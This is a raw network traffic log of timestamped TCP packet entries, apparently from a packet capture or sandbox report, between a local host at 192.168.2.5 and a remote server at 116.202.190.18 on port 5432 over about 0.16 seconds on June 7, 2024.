Jun 7, 2024 17:21:16.832628012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.832634926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.832684040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.836700916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.836752892 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.836791992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.836810112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.836810112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.836879015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.840230942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.840261936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.840301991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.840301991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.840317011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.840347052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.840368986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.840418100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.844110012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.844139099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.844183922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.844183922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.844213009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.844243050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.844264984 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.844286919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.847894907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.847923994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.847969055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.847969055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.847979069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.848009109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.848047018 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.848047018 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.851708889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.851761103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.851813078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.851813078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.851814032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.851843119 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.851883888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.851883888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.855695009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.855724096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.855767965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.855767965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.855853081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.855882883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.855926037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.855926037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.859585047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.859621048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.859637976 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.859654903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.859658003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.859707117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.863447905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.863476992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.863503933 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.863543034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.863579988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.863607883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.863624096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.863717079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.867254019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.867285013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.867328882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.867328882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.867338896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.867368937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.867417097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.867417097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.871222973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.871254921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.871304035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.871304035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.871309996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.871340036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.871367931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.871397972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.874977112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.875010967 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.875040054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.875046015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.875061035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.875143051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.878887892 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.878921986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.878946066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.878957987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.878971100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.879053116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.882736921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.882766962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.882802010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.882802010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.882819891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.882848978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.882872105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.882903099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.886502028 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.886532068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.886574030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.886574030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.886634111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.886663914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.886703968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.886703968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.890364885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.890393972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.890423059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.890448093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.890449047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.890476942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.890532970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.890532970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.895065069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.895119905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.895159960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.895169020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.895253897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.895255089 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.898081064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.898114920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.898149014 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.898159027 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.898159027 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.898189068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.901760101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.901794910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.901829004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.901839972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.901839972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.901974916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.905494928 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.905529022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.905563116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.905574083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.905574083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.905664921 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.909254074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.909288883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.909323931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.909339905 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.909339905 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.909461975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.914499998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.914684057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.914717913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.914717913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.914742947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.914779902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.919075966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.919106007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.919236898 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.919246912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.919267893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.919410944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.922813892 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.922951937 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.923016071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.923051119 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.923100948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.923100948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.926332951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.926362038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.926395893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.926413059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.926414013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.926517010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.926537991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.926716089 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.929534912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.929569960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.929605007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.929636002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.929636002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.929747105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.933039904 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.933068991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.933128119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.933128119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.933212042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.933240891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.933283091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.933283091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.936333895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.936400890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.936512947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.936542988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.936573982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.936593056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.936593056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.936691046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.939812899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.939841986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.939877987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.939888000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.939888000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.939923048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.939941883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.940047026 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.943056107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.943090916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.943124056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.943255901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.946314096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.946417093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.946480989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.946515083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.946563005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.946563005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.949789047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.949824095 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.949856997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.949867010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.949867010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.949949980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.950494051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.950529099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.950562000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.950576067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.950576067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.950608969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.952446938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.952497005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.952528000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.952532053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.952545881 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.952629089 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.954979897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.955014944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.955048084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.955064058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.955064058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.955157042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.957452059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.957487106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.957520962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.957531929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.957531929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.957586050 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.959641933 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.959676027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.959709883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.959724903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.959724903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.959793091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.966646910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966828108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966861010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966862917 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.966897011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966922045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.966922045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.966929913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966954947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.966965914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.966975927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.967015028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.969363928 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.969398975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.969433069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.969439030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.969439030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.969476938 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.969940901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.969976902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.970001936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.970010996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.970050097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.970050097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.970911980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.970942974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.970983028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.970983028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.972203016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.972256899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.972273111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.972290039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.972343922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.972343922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.974570990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.974605083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.974638939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.974658966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.974658966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.974710941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.977797985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.977833033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.977865934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.977879047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.977879047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.977957964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.978446960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.978482008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.978513956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.978522062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.978522062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.978584051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.980539083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.980590105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.980629921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.980643988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.980643988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.980788946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.982681990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.982739925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.982774973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.982779980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.982795954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.982829094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.984642029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.984678030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.984730005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.984739065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.984739065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.984987020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.986836910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.986872911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.986907959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.986922979 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.986922979 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.987287045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.988677979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.988714933 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.988749981 CEST	5432	49716	116.202.190.18	192.168.2.5
